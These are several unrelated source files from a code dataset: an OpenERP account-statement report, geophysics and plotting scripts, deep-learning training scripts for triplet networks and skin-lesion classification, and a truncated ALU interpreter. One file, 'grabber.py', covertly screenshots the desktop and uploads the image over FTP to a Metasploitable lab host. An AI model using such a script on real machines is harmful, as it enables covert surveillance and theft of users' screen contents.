If not, see .\n#\n##############################################################################\n\nfrom openerp.osv import fields, osv\nfrom openerp.tools.translate import _\nfrom report import report_sxw\nimport time\nfrom datetime import datetime\nimport pooler\n\nclass account_statement_parser(report_sxw.rml_parse):\n def __init__(self, cr, uid, name, context):\n super(account_statement_parser, self).__init__(cr, uid, name, context=context)\n self.localcontext.update({\n 'time': time,\n 'getLines': self._lines_get,\n 'getBalance': self._get_total_balance,\n })\n self.context = context\n self.client_balances = {}\n \n def _get_total_balance(self, partner):\n return self.client_balances[partner]\n \n def set_context(self, objects, data, ids, report_type=None):\n partners_ref = self.pool.get('res.partner')\n if 'active_ids' in data:\n ids = data['active_ids']\n else:\n ids = partners_ref.search(self.cr, self.uid, [])\n\n objects = partners_ref.browse(self.cr, self.uid, ids)\n objects = [obj for obj in objects if obj.customer or obj.supplier]\n return super(account_statement_parser, self).set_context(objects, data, ids , report_type=report_type)\n \n def get_name(self, moveline):\n if moveline.move_id.name == '/':\n return moveline.name\n else:\n return moveline.move_id.name\n \n def get_move_lines(self, moveline, moveline_ids):\n '''\n Get movelines related to the moveline selected\n '''\n moveline_obj = pooler.get_pool(self.cr.dbname).get('account.move.line')\n list = []\n movelines = moveline_obj.browse(self.cr, self.uid, moveline_ids)\n list = [line for line in movelines if line.move_id.id == moveline.move_id.id]\n return list\n \n def get_type(self, moveline):\n '''\n Get type of document\n '''\n invoice_obj = pooler.get_pool(self.cr.dbname).get('account.invoice')\n invoice_id = invoice_obj.search(self.cr, self.uid, [('move_id','=',moveline.move_id.id)])\n \n # filter invoices to map money sales\n if invoice_id:\n invoice = invoice_obj.browse(self.cr, self.uid, invoice_id)[0]\n # map money sales\n if invoice.type == 'out_money_sale' or invoice.type == 'in_money_sale':\n return _('Money Sale')\n type=''\n if moveline.journal_id.type in ('sale_refund', 'purchase_refund'):\n type = _('Credit Note')\n elif moveline.journal_id.type in ('sale', 'purchase'):\n if not moveline.advance_id:\n type= _('Invoice')\n else:\n type = _('Advance')\n elif moveline.journal_id.type in ('cash', 'bank'):\n type = _('Receipt')\n\n return type\n \n def _lines_get(self, partner, data):\n result = []\n balance_paid = 0.0\n moveline_obj = pooler.get_pool(self.cr.dbname).get('account.move.line')\n invoice_obj = pooler.get_pool(self.cr.dbname).get('account.invoice')\n movelines = []\n type=[]\n\n if data['result_selection'] == 'supplier':\n type = ['payable']\n elif data['result_selection'] == 'customer':\n type = ['receivable']\n else:\n type= ['receivable', 'payable']\n \n condictions = [('account_id.type', 'in', type), ('partner_id', '=', partner.id),\n ('state', '<>', 'draft'), ('state', '<>', 'cancel')]\n \n if data['date_from'] or data['date_to']:\n if data['date_from']:\n condictions += [('date','>=',data['date_from'])]\n if data['date_to']:\n condictions += [('date','<=',data['date_to'])]\n \n elif data['period_from'] or data['period_to']:\n periods_ref = pooler.get_pool(self.cr.dbname).get('account.period')\n if data['period_from']:\n condictions += [('date','>=', periods_ref.browse(self.cr,self.uid, data['period_from'][0]).date_start)]\n if data['period_to']:\n condictions += [('date','<=', 
periods_ref.browse(self.cr,self.uid,data['period_to'][0]).date_stop)]\n \n movelines = moveline_obj.search(self.cr, self.uid, condictions, order = 'date')\n rel_movelines = []\n processed_movelines = []\n \n _res = []\n balance_paid = 0.0\n \n this_company = self.pool.get('res.users').browse(self.cr, self.uid, self.uid).company_id\n \n for moveline in moveline_obj.browse(self.cr, self.uid, movelines):\n if moveline in processed_movelines:\n continue\n \n rel_movelines = self.get_move_lines(moveline, movelines)\n processed_movelines = processed_movelines + rel_movelines\n \n moveline_type = self.get_type(moveline)\n \n if moveline_type == '':\n continue\n \n inline = {'date': moveline.date,\n 'doc': moveline_type + ' ' + self.get_name(moveline),\n 'curr': this_company.currency_id.symbol,\n 'exch': 100.0, #Alterar\n 'exch_dif': 0.0, #Alterar\n 'disc': 0.0,\n 'debit': 0.0,\n 'credit': 0.0,\n 'balc': 0.0,\n 'id': moveline.id,\n }\n \n #get discount--------------\n invoice_id = invoice_obj.search(self.cr, self.uid, [('move_id','=',moveline.move_id.id)])\n if invoice_id:\n invoice = invoice_obj.browse(self.cr, self.uid, invoice_id)[0]\n for invoice_line in invoice.invoice_line:\n inline['disc'] += (invoice_line.discount/100) * (invoice_line.price_unit * invoice_line.quantity)\n #--------------------------\n\n credit_rec = 0.0\n debit_rec = 0.0\n credit = moveline.credit\n debit = moveline.debit\n \n if len(rel_movelines)>1:\n for line in rel_movelines:\n if line.credit:\n credit_rec += line.credit\n else:\n debit_rec += line.debit\n credit = credit_rec\n debit = debit_rec\n \n inline['debit'] += debit\n inline['credit'] += credit\n \n balance_paid += inline['debit'] + (inline['credit'] * -1)\n inline['balc'] = balance_paid\n _res.append(inline)\n \n self.client_balances[partner] = balance_paid\n _res.sort(key=lambda x: datetime.strptime(x['date'], '%Y-%m-%d'))\n return _res\n\n\nreport_sxw.report_sxw('report.single.account.statement', 'res.partner',\n 'tko_account_reports_ao/report/single_account_statement.rml', parser=account_statement_parser, header=\"external\")\n\nreport_sxw.report_sxw('report.multi.account.statement', 'res.partner',\n 'tko_account_reports_ao/report/multi_account_statement.rml', parser=account_statement_parser, header=\"internal\")\n\nreport_sxw.report_sxw('report.single.account.statement.simple', 'res.partner',\n 'tko_account_reports_ao/report/single_account_statement_simple.rml', parser=account_statement_parser, header=\"external\")\n\nreport_sxw.report_sxw('report.multi.account.statement.simple', 'res.partner',\n 'tko_account_reports_ao/report/multi_account_statement_simple.rml', parser=account_statement_parser, header=\"internal\")","sub_path":"tko_account_reports_ao/report/account_statement.py","file_name":"account_statement.py","file_ext":"py","file_size_in_byte":8608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"320491884","text":"\"\"\"\nGravMag: Forward modeling of the gravity anomaly and gravity gradient tensor\nusing spheres\n\"\"\"\nfrom fatiando import mesher, gridder, gravmag\nfrom fatiando.vis import mpl\n\nspheres = [mesher.Sphere(0, 0, 2000, 1000, {'density':1000})]\narea = (-5000, 5000, -5000, 5000)\nshape = (100, 100)\nx, y, z = gridder.regular(area, shape, z=-100)\ngz = gravmag.sphere.gz(x, y, z, spheres)\ntensor = [gravmag.sphere.gxx(x, y, z, spheres),\n gravmag.sphere.gxy(x, y, z, spheres),\n gravmag.sphere.gxz(x, y, z, spheres),\n gravmag.sphere.gyy(x, y, z, spheres),\n gravmag.sphere.gyz(x, y, 
z, spheres),\n gravmag.sphere.gzz(x, y, z, spheres)]\nmpl.figure()\nmpl.axis('scaled')\nmpl.title('gz')\nmpl.contourf(y, x, gz, shape, 15)\nmpl.colorbar()\nmpl.m2km()\nmpl.figure()\ntitles = ['gxx', 'gxy', 'gxz', 'gyy', 'gyz', 'gzz']\nfor i, field in enumerate(tensor):\n mpl.subplot(2, 3, i + 1)\n mpl.axis('scaled')\n mpl.title(titles[i])\n levels = mpl.contourf(y, x, field, shape, 15)\n mpl.colorbar()\n mpl.m2km()\nmpl.show()\n","sub_path":"cookbook/gravmag_grav_sphere.py","file_name":"gravmag_grav_sphere.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"598553277","text":"# screen shot grabber \n\nimport wx # pip install wxpython\nimport os\nimport ftplib\n\nw = wx.App()\nscreen = wx.ScreenDC()\nsize = screen.GetSize()\nbmap = wx.Bitmap(size[0],size[1])\nmemo = wx.MemoryDC(bmap)\nmemo.Blit(0,0,size[0],size[1],screen,0,0)\n\ndel memo\nbmap.SaveFile(\"grabbed.png\", wx.BITMAP_TYPE_PNG)\n\nsess_ = ftplib.FTP(\"192.168.0.1\",\"msfadmin\",\"msfadmin\") #ftp server running on metsploitable2\nfile_ = open(\"grabbed.png\", \"rb\")\nsess_.storebinary(\"STOR /tmp/grabbed.png\", file_)\n\nfile_.close()\nsess_.quit()","sub_path":"grabber.py","file_name":"grabber.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"334213047","text":"from argparse import ArgumentParser\nimport chainer\nfrom src.resnet import ResNet49Layers\nfrom chainer.training import extensions\n\nfrom src.dataset import LabelHandler\nfrom src.data_loader import SortedImageDatasetBuilder\nfrom tripletembedding.predictors.tripletnet import TripletNet\nfrom tripletembedding.iterators import TripletIterator\n\n\ndef run_train():\n parser = ArgumentParser()\n parser.add_argument('--paths', type=str, nargs='+', required=True,\n help='Root paths of folders that contain images and pascal voc files')\n parser.add_argument('--label_names', type=str, required=True,\n help='Path to label names file')\n parser.add_argument('--training_splitsize', type=float, default=0.9,\n help='Splitsize of training data')\n parser.add_argument('--batchsize', type=int, default=20,\n help='Learning minibatch size')\n parser.add_argument('--epoch', type=int, default=10,\n help='Numbers of epochs to train')\n parser.add_argument('--gpu', type=int, default=0,\n help='GPU ID, negative value indicates CPU')\n parser.add_argument('--out', default='trainer_output',\n help='Output directory of trainer')\n parser.add_argument('--val_batchsize', type=int, default=250,\n help='Validation minibatch size')\n parser.add_argument('--pretrained_model', type=str, default=None)\n args = parser.parse_args()\n\n tn = TripletNet(cnn=ResNet49Layers, kwargs={'pretrained_model': args.pretrained_model})\n if args.gpu >= 0:\n chainer.cuda.get_device_from_id(args.gpu).use()\n tn.to_gpu()\n\n label_handler = LabelHandler(args.label_names)\n builder = SortedImageDatasetBuilder(args.paths, label_handler)\n train_dataset, val_dataset = builder.get_sorted_image_dataset_split(args.training_splitsize)\n\n train_iter = TripletIterator(train_dataset, args.batchsize)\n val_iter = TripletIterator(val_dataset, args.val_batchsize)\n\n # optimizer\n learning_rate = 0.01\n momentum = 0.9\n optimizer = chainer.optimizers.MomentumSGD(learning_rate, momentum)\n optimizer.setup(tn)\n\n # trainer\n updater = chainer.training.updater.StandardUpdater(train_iter, optimizer, device=args.gpu)\n trainer = 
chainer.training.Trainer(updater, (args.epoch, 'epoch'), args.out)\n\n trainer.extend(extensions.LogReport())\n trainer.extend(chainer.training.extensions.ProgressBar(update_interval=10))\n\n print('@A')\n trainer.run()\n\n # save model\n output_file_path = '{0}/triplet_net_{1}_{2}.model'.format(args.out, args.batchsize, args.epoch)\n chainer.serializers.save_npz(output_file_path, tn)\n","sub_path":"src/run_triplet.py","file_name":"run_triplet.py","file_ext":"py","file_size_in_byte":2724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"226483602","text":"from mpl_toolkits import mplot3d\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfig = plt.figure()\nax = plt.axes(projection=\"3d\")\n\n#SCATTER PLOT\n# z_line = np.linspace(0, 15, 1000)\n# x_line = np.cos(z_line)\n# y_line = np.sin(z_line)\n# ax.plot3D(x_line, y_line, z_line, 'gray')\n#\n# z_points = 15 * np.random.random(100)\n# x_points = np.cos(z_points) + 0.1 * np.random.randn(100)\n# y_points = np.sin(z_points) + 0.1 * np.random.randn(100)\n# ax.scatter3D(x_points, y_points, z_points, c=z_points, cmap='hsv');\n\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom mpl_toolkits.mplot3d.art3d import Poly3DCollection\nimport matplotlib.pyplot as plt\n#fig = plt.figure()\n#ax = Axes3D(fig)\nx = [0,0.2,0.2,0]\ny = [0,0,0.2,0.2]\nz = [0,0,0.2,0.2]\n\n\nA=np.array([x,y,z])\n\n\na= 1\nverts=None\nvert2=None\nwhile a <= 4:\n print (a)\n a+=0.05\n\n\n verts = [list(zip(x,y,z))]\n print(\"verts\", verts)\n\n if vert2:\n print(\"vert2\", vert2)\n #ax.remove_collection3d(Poly3DCollection(vert2))\n if a <=2:\n #SHEAR TRANSFORM.\n S=np.matrix([[a,0,0],[0,1,0],[0,0,1]])\n V=np.dot(S,A)\n list1 = V.tolist()\n\n if a >2 and a <3:\n #ROTATION TRANSFORM.\n theta = a* np.pi/180\n Rz = np.array([[np.cos(theta), -np.sin(theta), 0.0], [np.sin(theta), np.cos(theta), 0.0],[0.0,0.0, 1.0],])\n A= Rz @ A\n list1=A.tolist()\n\n if a >=3 and a<3.5:\n #TRANSLATE TRANSFORM.\n Ty= np.matrix([[0,0,0,0],[a-3,a-3,a-3,a-3],[0,0,0,0]])\n A=A + Ty\n list1=A.tolist()\n\n print (list1[0][1])\n x = list1[0]\n y = list1[1]\n z = list1[2]\n vert2 = [list(zip(x,y,z))]\n print (vert2)\n ax.add_collection3d(Poly3DCollection(vert2))\n plt.draw()\n plt.pause(0.001)\n","sub_path":"3dplots.py","file_name":"3dplots.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"341538895","text":"import os\nimport csv\nimport random\nimport argparse\nimport numpy as np\nfrom tensorboardX import SummaryWriter\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.optim.lr_scheduler as lr_scheduler\nimport torchvision\nimport torchvision.utils as utils\nimport torchvision.transforms as torch_transforms\nfrom networks import AttnVGG\nfrom loss import FocalLoss, DiceLoss\nfrom data import preprocess_data_2016, preprocess_data_2017, ISIC\nfrom utilities import *\nfrom transforms import *\n\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\n\ntorch.backends.cudnn.benchmark = True\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\ndevice_ids = [0]\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\"--preprocess\", action='store_true', help=\"run preprocess_data\")\nparser.add_argument(\"--dataset\", type=str, default=\"ISIC2017\", help='ISIC2017 / ISIC2016')\nparser.add_argument(\"--seg\", type=str, 
default=\"lesion\", help='lesion / dermo')\n\nparser.add_argument(\"--batch_size\", type=int, default=32, help=\"batch size\")\nparser.add_argument(\"--epochs\", type=int, default=50, help=\"number of epochs\")\nparser.add_argument(\"--lr\", type=float, default=0.01, help=\"initial learning rate\")\nparser.add_argument(\"--outf\", type=str, default=\"logs\", help='path of log files')\nparser.add_argument(\"--base_up_factor\", type=int, default=8, help=\"upsample ratio for attention visualization\")\n\nparser.add_argument(\"--normalize_attn\", action='store_true', help='if True, attention map is normalized by softmax; otherwise use sigmoid')\nparser.add_argument(\"--focal_loss\", action='store_true', help='turn on focal loss (otherwise use cross entropy loss)')\nparser.add_argument(\"--no_attention\", action='store_true', help='turn off attention')\nparser.add_argument(\"--over_sample\", action='store_true', help='offline oversampling')\nparser.add_argument(\"--log_images\", action='store_true', help='visualze images in Tensoeboard')\n\nopt = parser.parse_args()\n\ndef _worker_init_fn_():\n torch_seed = torch.initial_seed()\n np_seed = torch_seed // 2**32-1\n random.seed(torch_seed)\n np.random.seed(np_seed)\n\ndef main():\n # load data\n print('\\nloading the dataset ...')\n assert opt.dataset == \"ISIC2016\" or opt.dataset == \"ISIC2017\"\n if opt.dataset == \"ISIC2016\":\n num_aug = 5\n normalize = Normalize((0.7012, 0.5517, 0.4875), (0.0942, 0.1331, 0.1521))\n elif opt.dataset == \"ISIC2017\":\n num_aug = 2\n normalize = Normalize((0.6820, 0.5312, 0.4736), (0.0840, 0.1140, 0.1282))\n if opt.over_sample:\n print('data is offline oversampled ...')\n train_file = 'train_oversample.csv'\n else:\n print('no offline oversampling ...')\n train_file = 'train.csv'\n im_size = 224\n transform_train = torch_transforms.Compose([\n RatioCenterCrop(0.8),\n Resize((256,256)),\n RandomCrop((224,224)),\n RandomRotate(),\n RandomHorizontalFlip(),\n RandomVerticalFlip(),\n ToTensor(),\n normalize\n ])\n transform_val = torch_transforms.Compose([\n RatioCenterCrop(0.8),\n Resize((256,256)),\n CenterCrop((224,224)),\n ToTensor(),\n normalize\n ])\n trainset = ISIC(csv_file=train_file, transform=transform_train)\n trainloader = torch.utils.data.DataLoader(trainset, batch_size=opt.batch_size, shuffle=True,\n num_workers=8, worker_init_fn=_worker_init_fn_(), drop_last=True)\n valset = ISIC(csv_file='val.csv', transform=transform_val)\n valloader = torch.utils.data.DataLoader(valset, batch_size=64, shuffle=False, num_workers=8)\n print('done\\n')\n\n # load models\n print('\\nloading the model ...')\n\n if not opt.no_attention:\n print('turn on attention ...')\n if opt.normalize_attn:\n print('use softmax for attention map ...')\n else:\n print('use sigmoid for attention map ...')\n else:\n print('turn off attention ...')\n\n net = AttnVGG(num_classes=2, attention=not opt.no_attention, normalize_attn=opt.normalize_attn)\n dice = DiceLoss()\n if opt.focal_loss:\n print('use focal loss ...')\n criterion = FocalLoss(gama=2., size_average=True, weight=None)\n else:\n print('use cross entropy loss ...')\n criterion = nn.CrossEntropyLoss()\n print('done\\n')\n\n # move to GPU\n print('\\nmoving models to GPU ...')\n model = nn.DataParallel(net, device_ids=device_ids).to(device)\n criterion.to(device)\n dice.to(device)\n print('done\\n')\n\n # optimizer\n optimizer = optim.SGD(model.parameters(), lr=opt.lr, momentum=0.9, weight_decay=1e-4, nesterov=True)\n lr_lambda = lambda epoch : np.power(0.1, epoch//10)\n 
scheduler = lr_scheduler.LambdaLR(optimizer, lr_lambda=lr_lambda)\n\n # training\n print('\\nstart training ...\\n')\n step = 0\n EMA_accuracy = 0\n AUC_val = 0\n writer = SummaryWriter(opt.outf)\n if opt.log_images:\n data_iter = iter(valloader)\n fixed_batch = next(data_iter)\n fixed_batch = fixed_batch['image'][0:16,:,:,:].to(device)\n for epoch in range(opt.epochs):\n torch.cuda.empty_cache()\n # adjust learning rate\n scheduler.step()\n current_lr = optimizer.param_groups[0]['lr']\n writer.add_scalar('train/learning_rate', current_lr, epoch)\n print(\"\\nepoch %d learning rate %f\\n\" % (epoch+1, current_lr))\n # run for one epoch\n for aug in range(num_aug):\n for i, data in enumerate(trainloader, 0):\n # warm up\n model.train()\n model.zero_grad()\n optimizer.zero_grad()\n inputs, seg, labels = data['image'], data['image_seg'], data['label']\n seg = seg[:,-1:,:,:]\n seg_1 = F.adaptive_avg_pool2d(seg, im_size//opt.base_up_factor)\n seg_2 = F.adaptive_avg_pool2d(seg, im_size//opt.base_up_factor//2)\n inputs, seg_1, seg_2, labels = inputs.to(device), seg_1.to(device), seg_2.to(device), labels.to(device)\n # forward\n pred, a1, a2 = model(inputs)\n # backward\n loss_c = criterion(pred, labels)\n loss_seg1 = dice(a1, seg_1)\n loss_seg2 = dice(a2, seg_2)\n loss = loss_c + 0.001 * loss_seg1 + 0.01 * loss_seg2\n loss.backward()\n optimizer.step()\n # display results\n if i % 10 == 0:\n model.eval()\n pred, __, __ = model(inputs)\n predict = torch.argmax(pred, 1)\n total = labels.size(0)\n correct = torch.eq(predict, labels).sum().double().item()\n accuracy = correct / total\n EMA_accuracy = 0.9*EMA_accuracy + 0.1*accuracy\n writer.add_scalar('train/loss_c', loss_c.item(), step)\n writer.add_scalar('train/loss_seg1', loss_seg1.item(), step)\n writer.add_scalar('train/loss_seg2', loss_seg2.item(), step)\n writer.add_scalar('train/accuracy', accuracy, step)\n writer.add_scalar('train/EMA_accuracy', EMA_accuracy, step)\n print(\"[epoch %d][aug %d/%d][iter %d/%d] loss_c %.4f loss_seg1 %.4f loss_seg2 %.4f accuracy %.2f%% EMA %.2f%%\"\n % (epoch+1, aug+1, num_aug, i+1, len(trainloader), loss_c.item(), loss_seg1.item(), loss_seg2.item(), (100*accuracy), (100*EMA_accuracy)))\n step += 1\n # the end of each epoch - validation results\n model.eval()\n total = 0\n correct = 0\n with torch.no_grad():\n with open('val_results.csv', 'wt', newline='') as csv_file:\n csv_writer = csv.writer(csv_file, delimiter=',')\n for i, data in enumerate(valloader, 0):\n images_val, labels_val = data['image'], data['label']\n images_val, labels_val = images_val.to(device), labels_val.to(device)\n pred_val, __, __ = model(images_val)\n predict = torch.argmax(pred_val, 1)\n total += labels_val.size(0)\n correct += torch.eq(predict, labels_val).sum().double().item()\n # record predictions\n responses = F.softmax(pred_val, dim=1).squeeze().cpu().numpy()\n responses = [responses[i] for i in range(responses.shape[0])]\n csv_writer.writerows(responses)\n AP, AUC, precision_mean, precision_mel, recall_mean, recall_mel = compute_metrics('val_results.csv', 'val.csv')\n # save checkpoints\n print('\\nsaving checkpoints ...\\n')\n checkpoint = {\n 'state_dict': model.module.state_dict(),\n 'opt_state_dict': optimizer.state_dict(),\n }\n torch.save(checkpoint, os.path.join(opt.outf, 'checkpoint_latest.pth'))\n if AUC > AUC_val: # save optimal validation model\n torch.save(checkpoint, os.path.join(opt.outf,'checkpoint.pth'))\n AUC_val = AUC\n # log scalars\n writer.add_scalar('val/accuracy', correct/total, epoch)\n 
writer.add_scalar('val/mean_precision', precision_mean, epoch)\n writer.add_scalar('val/mean_recall', recall_mean, epoch)\n writer.add_scalar('val/precision_mel', precision_mel, epoch)\n writer.add_scalar('val/recall_mel', recall_mel, epoch)\n writer.add_scalar('val/AP', AP, epoch)\n writer.add_scalar('val/AUC', AUC, epoch)\n print(\"\\n[epoch %d] val result: accuracy %.2f%%\" % (epoch+1, 100*correct/total))\n print(\"\\nmean precision %.2f%% mean recall %.2f%% \\nprecision for mel %.2f%% recall for mel %.2f%%\" %\n (100*precision_mean, 100*recall_mean, 100*precision_mel, 100*recall_mel))\n print(\"\\nAP %.4f AUC %.4f\\n optimal AUC: %.4f\" % (AP, AUC, AUC_val))\n # log images\n if opt.log_images:\n print('\\nlog images ...\\n')\n I_train = utils.make_grid(inputs[0:16,:,:,:], nrow=4, normalize=True, scale_each=True)\n I_seg_1 = utils.make_grid(seg_1[0:16,:,:,:], nrow=4, normalize=True, scale_each=True)\n I_seg_2 = utils.make_grid(seg_2[0:16,:,:,:], nrow=4, normalize=True, scale_each=True)\n writer.add_image('train/image', I_train, epoch)\n writer.add_image('train/seg1', I_seg_1, epoch)\n writer.add_image('train/seg2', I_seg_2, epoch)\n if epoch == 0:\n I_val = utils.make_grid(fixed_batch, nrow=4, normalize=True, scale_each=True)\n writer.add_image('val/image', I_val, epoch)\n if opt.log_images and (not opt.no_attention):\n print('\\nlog attention maps ...\\n')\n # training data\n __, a1, a2 = model(inputs[0:16,:,:,:])\n if a1 is not None:\n attn1 = visualize_attn(I_train, a1, up_factor=opt.base_up_factor, nrow=4)\n writer.add_image('train/attention_map_1', attn1, epoch)\n if a2 is not None:\n attn2 = visualize_attn(I_train, a2, up_factor=2*opt.base_up_factor, nrow=4)\n writer.add_image('train/attention_map_2', attn2, epoch)\n # val data\n __, a1, a2 = model(fixed_batch)\n if a1 is not None:\n attn1 = visualize_attn(I_val, a1, up_factor=opt.base_up_factor, nrow=4)\n writer.add_image('val/attention_map_1', attn1, epoch)\n if a2 is not None:\n attn2 = visualize_attn(I_val, a2, up_factor=2*opt.base_up_factor, nrow=4)\n writer.add_image('val/attention_map_2', attn2, epoch)\n\nif __name__ == \"__main__\":\n if opt.preprocess:\n assert opt.seg == \"lesion\" or opt.seg == \"dermo\"\n if opt.dataset == \"ISIC2016\":\n preprocess_data_2016(root_dir='../data_2016')\n elif opt.dataset == \"ISIC2017\":\n if opt.seg == 'lesion':\n preprocess_data_2017(root_dir='../data_2017', seg_dir='Train_Lesion')\n elif opt.seg == 'dermo':\n preprocess_data_2017(root_dir='../data_2017', seg_dir='Train_Dermo')\n main()\n","sub_path":"train_seg.py","file_name":"train_seg.py","file_ext":"py","file_size_in_byte":12480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"568080572","text":"# File: main.py\n# -------------\n# The script where the program state is set and the\n# desired commands are run.\n\nimport argparse\nimport torch\n\nimport models\nimport constants\nimport train_utils\nimport data_utils\nimport utils\n\ndef get_arguments():\n '''\n Function to parse the command line arguments and return them\n as an \n '''\n # Initialize the parser\n parser = argparse.ArgumentParser(description=\"Text-to-Image Synthesis with MirrorGAN\")\n\n # Task options\n parser.add_argument(\"--pretrain\", action='store_true',\n help=\"if set, we will pretrain the DAMSM model\")\n parser.add_argument(\"--validate\", action='store_true')\n parser.add_argument(\"--mirrorgan\", action='store_true')\n\n # Training options\n parser.add_argument(\"--batch_size\", type=int, 
default=constants.BATCH_SIZE,\n help=\"batch_size: Batch size used for training and evaluation\")\n parser.add_argument(\"--num_workers\", type=int, default=constants.NUM_WORKERS,\n help=\"num_workers: Number of data loader workers\")\n parser.add_argument('--start_epoch', type=int, default=constants.START_EPOCH,\n help=\"The epoch to start at if resuming training\")\n parser.add_argument(\"--epochs\", type=int, default=constants.EPOCHS,\n help=\"epochs: Number of epochs to train the model\")\n parser.add_argument(\"--save_every\", type=int, default=constants.SAVE_EVERY)\n parser.add_argument(\"--damsm_lr\", type=float, default=constants.DAMSM_LR,\n help=\"damsm_lr: learning rate for DAMSM training\")\n parser.add_argument(\"--caption_lr\", type=float, default=constants.CAPTION_LR)\n parser.add_argument(\"--gen_lr\", type=float, default=constants.GEN_LR)\n parser.add_argument(\"--disc_lr\", type=float, default=constants.DISC_LR) \n parser.add_argument(\"--gamma_1\", type=float, default=constants.GAMMA_1)\n parser.add_argument(\"--gamma_2\", type=float, default=constants.GAMMA_2)\n parser.add_argument(\"--gamma_3\", type=float, default=constants.GAMMA_3)\n parser.add_argument(\"--lmbda\", type=float, default=constants.LAMBDA)\n\n # Experiment options\n parser.add_argument(\"--exp_name\", type=str, help=\"exp_name: Name of experiment\")\n parser.add_argument(\"--damsm_name\", type=str, default=constants.DAMSM_NAME,\n help=\"damsm_folder: Name of the experiment from which the DAMSM module is loaded\")\n parser.add_argument(\"--damsm_load_epoch\", type=int, default=constants.DAMSM_LOAD_EPOCH,\n help=\"Specify which epoch of training we wish to load from. -1 indicates fresh start\")\n parser.add_argument(\"--caption_name\", type=str, default=constants.CAPTION_NAME,\n help=\"caption_name: Name of the experiment from which the image captioner will be loaded\")\n parser.add_argument(\"--caption_load_epoch\", type=int, default=constants.CAPTION_LOAD_EPOCH)\n parser.add_argument(\"--inception_model_path\", type=str, default=constants.INCEPTION_MODEL_PATH)\n parser.add_argument(\"--inception_load_epoch\", type=int, default=constants.INCEPTION_LOAD_EPOCH) \n parser.add_argument(\"--load_epoch\", type=int, default=constants.LOAD_EPOCH,\n help=\"Similar to damsm_load_epoch\")\n parser.add_argument(\"--seed\", type=int, default=constants.SEED,\n help=\"seed: Random seed for the experiment\")\n\n # Architecture options\n # Text encoder options\n parser.add_argument(\"--embed_size\", type=int, default=constants.EMBED_SIZE,\n help=\"embed_dim: The dimension of the word embeddings\")\n parser.add_argument(\"--dropout_prob\", type=float, default=constants.DROPOUT_PROB,\n help=\"drop_prob: Dropout probability\")\n parser.add_argument(\"--num_encoder_layers\", type=int, default=constants.NUM_ENCODER_LAYERS,\n help=\"n_encoder_layers: Number of hidden layers in the encoder LSTM\")\n parser.add_argument(\"--encoding_size\", type=int, default=constants.ENCODING_SIZE,\n help=\"encoding_size: The dimension of a word-encoding (D)\")\n parser.add_argument(\"--weight_range\", type=float, default=constants.WEIGHT_RANGE,\n help=\"encoder_init_range: The range with which the encoder will be initialized\")\n parser.add_argument(\"--ca_size\", type=int, default=constants.CA_SIZE,\n help=\"ca_size: The dimension of the conditioning augmentation sentence encoding\")\n parser.add_argument(\"--in_channels\", type=int, default=constants.IN_CHANNELS,\n help=\"in_channels: Base number of feature maps used in the generator\")\n 
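# Example invocation (hypothetical values; every default above comes from constants.py):\n    #   python main.py --pretrain --batch_size 64 --epochs 120 --damsm_lr 2e-4\n    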
parser.add_argument(\"--z_size\", type=int, default=constants.Z_SIZE,\n help=\"z_size: Dimension of the z noise\")\n parser.add_argument(\"--discriminator_filters\", type=int, default=constants.DISCRIMINATOR_FILTERS,\n help=\"discriminator_filters: Base number of feature maps in the discriminators\") \n parser.add_argument(\"--caption_embedding_size\", type=int, default=constants.CAPTION_EMBEDDING_SIZE)\n parser.add_argument(\"--caption_hidden_size\", type=int, default=constants.CAPTION_HIDDEN_SIZE)\n parser.add_argument(\"--caption_num_layers\", type=int, default=constants.CAPTION_NUM_LAYERS) \n\n args = parser.parse_args()\n augment_args(args)\n return args\n\ndef augment_args(args):\n '''\n We treat args like a state dictionary. All features that cannot be specified\n as arguments will be added here\n '''\n args.device = torch.device('cuda:0') if torch.cuda.is_available()\\\n else torch.device('cpu')\n\nif __name__ == '__main__':\n torch.backends.cudnn.benchmark = True\n torch.backends.cudnn.enabled = True\n\n args = get_arguments()\n\n # Initialize experiment (seeds, folders, and logging)\n utils.initialize_experiment(args)\n\n # Get dataloader/dataset. Make sure what's going on here after implementation\n split = 'test' if args.validate else 'train'\n dataloader = data_utils.get_dataloader(args, split=split)\n\n # Initialize models\n model = models.initialize_models(args)\n\n # More options here, to be updated\n if args.pretrain and not args.mirrorgan:\n train_utils.damsm_main(args, model, dataloader)\n elif args.pretrain and args.mirrorgan:\n train_utils.caption_main(args, model, dataloader)\n else:\n train_utils.generator_main(args, model, dataloader)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"228749646","text":"import os\nfrom collections import deque\n\n\nclass ArithmeticLogicUnit:\n def __init__(self, instructions: list[str]) -> None:\n self.instructions = instructions\n self.inputs = None\n self.w = 0\n self.x = 0\n self.y = 0\n self.z = 0\n\n def get(self, name: str):\n if name in {\"w\", \"x\", \"y\", \"z\"}:\n return getattr(self, name)\n else:\n return int(name)\n\n def run(self, inputs: deque):\n self.inputs = inputs\n for ins in self.instructions:\n ins_code, *args = ins.split()\n getattr(self, ins_code)(*args)\n\n def inp(self, a):\n setattr(self, a, self.inputs.popleft())\n\n def add(self, a, b):\n setattr(self, a, getattr(self, a) + self.get(b))\n\n def mul(self, a, b):\n setattr(self, a, getattr(self, a) * self.get(b))\n\n def div(self, a, b):\n setattr(self, a, getattr(self, 